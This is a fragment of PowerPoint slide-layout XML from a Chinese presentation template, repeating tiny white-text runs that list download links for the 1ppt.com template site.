              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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50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50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50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50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50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50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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout50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50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50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50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51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51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51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51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51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51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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout51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51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51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51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52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52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52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52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52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52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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
